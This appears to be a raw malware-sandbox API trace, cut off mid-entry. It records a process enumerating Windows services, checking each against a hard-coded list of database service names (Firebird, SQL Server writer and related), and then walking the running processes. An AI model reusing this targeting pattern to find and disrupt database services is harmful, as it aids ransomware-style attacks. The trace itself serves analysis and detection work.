dwServiceType=0x30, dwServiceState=0x1, lpServices=0x772a60, cbBufSize=0x1d8a, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x772a60, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0180.868] CloseServiceHandle (hSCObject=0x74ed68) returned 1 [0180.868] lstrlenW (lpString="Appinfo") returned 7 [0180.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0180.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0180.869] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0180.869] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0180.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0180.869] lstrlenW (lpString="AppXSvc") returned 7 [0180.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0180.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0180.869] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0180.869] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0180.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0180.869] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0180.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0180.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0180.869] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0180.869] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0180.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0180.869] lstrlenW (lpString="Audiosrv") returned 8 [0180.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0180.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0180.869] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0180.869] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0180.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0180.869] lstrlenW (lpString="BFE") returned 3 [0180.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0180.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0180.870] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0180.870] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0180.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0180.870] lstrlenW (lpString="BITS") returned 4 [0180.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0180.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0180.870] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0180.870] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0180.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0180.870] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0180.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0180.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0180.870] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0180.870] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0180.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0180.870] lstrlenW (lpString="CDPSvc") returned 6 [0180.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0180.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0180.870] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0180.870] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0180.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0180.870] lstrlenW (lpString="ClickToRunSvc") returned 13 [0180.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0180.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0180.870] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0180.871] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0180.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0180.871] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0180.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0180.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0180.871] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0180.871] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0180.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0180.871] lstrlenW (lpString="CryptSvc") returned 8 [0180.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0180.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0180.871] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0180.871] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0180.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0180.871] lstrlenW (lpString="DcomLaunch") returned 10 [0180.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0180.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0180.871] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0180.871] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0180.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0180.871] lstrlenW (lpString="Dhcp") returned 4 [0180.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0180.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0180.871] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0180.871] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0180.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0180.871] lstrlenW (lpString="Dnscache") returned 8 [0180.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0180.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0180.872] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0180.872] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0180.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0180.872] lstrlenW (lpString="DoSvc") returned 5 [0180.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0180.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0180.872] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0180.872] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0180.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0180.872] lstrlenW (lpString="DPS") returned 3 [0180.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0180.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0180.872] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0180.872] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0180.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0180.872] lstrlenW (lpString="DusmSvc") returned 7 [0180.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0180.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0180.873] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0180.873] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0180.873] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0180.873] lstrlenW (lpString="EventLog") returned 8 [0180.873] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0180.873] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0180.873] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0180.873] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0180.873] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0180.873] lstrlenW (lpString="EventSystem") returned 11 [0180.874] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0180.874] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0180.874] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0180.874] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0180.874] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0180.874] lstrlenW (lpString="FontCache") returned 9 [0180.874] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0180.874] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0180.874] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0180.874] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0180.874] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0180.874] lstrlenW (lpString="gpsvc") returned 5 [0180.874] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0180.874] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0180.874] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0180.874] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0180.874] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0180.874] lstrlenW (lpString="iphlpsvc") returned 8 [0180.874] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0180.874] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0180.874] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0180.874] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0180.874] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0180.874] lstrlenW (lpString="KeyIso") returned 6 [0180.874] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0180.874] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0180.874] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0180.875] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0180.875] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0180.875] lstrlenW (lpString="LanmanServer") returned 12 [0180.875] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0180.875] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0180.875] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0180.875] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0180.875] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0180.875] lstrlenW (lpString="LanmanWorkstation") returned 17 [0180.875] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0180.875] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0180.875] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0180.875] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0180.875] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0180.875] lstrlenW (lpString="lfsvc") returned 5 [0180.875] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0180.875] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0180.875] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0180.875] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0180.875] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0180.875] lstrlenW (lpString="lmhosts") returned 7 [0180.875] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0180.875] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0180.875] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0180.875] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0180.875] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0180.875] lstrlenW (lpString="LSM") returned 3 [0180.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0180.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0180.876] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0180.876] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0180.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0180.876] lstrlenW (lpString="MpsSvc") returned 6 [0180.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0180.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0180.876] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0180.876] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0180.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0180.876] lstrlenW (lpString="NcbService") returned 10 [0180.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0180.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0180.876] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0180.876] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0180.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0180.876] lstrlenW (lpString="netprofm") returned 8 [0180.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0180.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0180.876] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0180.876] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0180.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0180.876] lstrlenW (lpString="NlaSvc") returned 6 [0180.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0180.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0180.876] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0180.877] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0180.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0180.877] lstrlenW (lpString="nsi") returned 3 [0180.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0180.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0180.877] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0180.877] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0180.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0180.877] lstrlenW (lpString="PcaSvc") returned 6 [0180.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0180.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0180.877] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0180.877] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0180.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0180.877] lstrlenW (lpString="PlugPlay") returned 8 [0180.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0180.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0180.877] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0180.877] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0180.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0180.877] lstrlenW (lpString="Power") returned 5 [0180.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0180.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0180.877] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0180.877] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0180.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0180.877] lstrlenW (lpString="ProfSvc") returned 7 [0180.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0180.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0180.878] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0180.878] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0180.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0180.878] lstrlenW (lpString="RpcEptMapper") returned 12 [0180.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0180.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0180.878] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0180.878] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0180.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0180.878] lstrlenW (lpString="RpcSs") returned 5 [0180.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0180.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0180.878] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0180.878] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0180.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0180.878] lstrlenW (lpString="SamSs") returned 5 [0180.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0180.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0180.878] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0180.878] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0180.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0180.878] lstrlenW (lpString="Schedule") returned 8 [0180.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0180.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0180.878] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0180.878] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0180.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0180.879] lstrlenW (lpString="SecurityHealthService") returned 21 [0180.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0180.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0180.879] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0180.879] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0180.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0180.879] lstrlenW (lpString="SENS") returned 4 [0180.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0180.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0180.879] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0180.879] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0180.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0180.879] lstrlenW (lpString="ShellHWDetection") returned 16 [0180.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0180.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0180.879] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0180.879] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0180.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0180.879] lstrlenW (lpString="Spooler") returned 7 [0180.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0180.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0180.879] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0180.879] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0180.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0180.879] lstrlenW (lpString="sppsvc") returned 6 [0180.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0180.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0180.880] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0180.880] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0180.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0180.880] lstrlenW (lpString="SSDPSRV") returned 7 [0180.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0180.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0180.880] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0180.880] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0180.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0180.880] lstrlenW (lpString="StateRepository") returned 15 [0180.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0180.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0180.880] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0180.880] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0180.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0180.880] lstrlenW (lpString="SysMain") returned 7 [0180.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0180.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0180.880] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0180.880] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0180.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0180.880] lstrlenW (lpString="SystemEventsBroker") returned 18 [0180.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0180.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0180.880] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0180.880] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0180.881] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x772a60 | out: hHeap=0x710000) returned 1 [0180.881] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x354 [0180.911] Process32FirstW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.912] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.913] lstrlenW (lpString="System") returned 6 [0180.913] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.914] lstrlenW (lpString="smss.exe") returned 8 [0180.914] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.914] lstrlenW (lpString="csrss.exe") returned 9 [0180.914] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.915] lstrlenW (lpString="wininit.exe") returned 11 [0180.915] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.916] lstrlenW (lpString="csrss.exe") returned 9 [0180.916] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, 